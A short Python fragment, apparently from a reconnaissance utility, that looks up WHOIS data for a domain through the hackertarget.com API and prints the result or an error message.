        text = requests.get('http://api.hackertarget.com/whois/?q=' + dom).text
        nping = str(text)
        if 'error' not in nping:
            print(color.END + nping + C)
        else:
            print(R + ' [-] Outbound Query Exception!')
            time.sleep(0.8)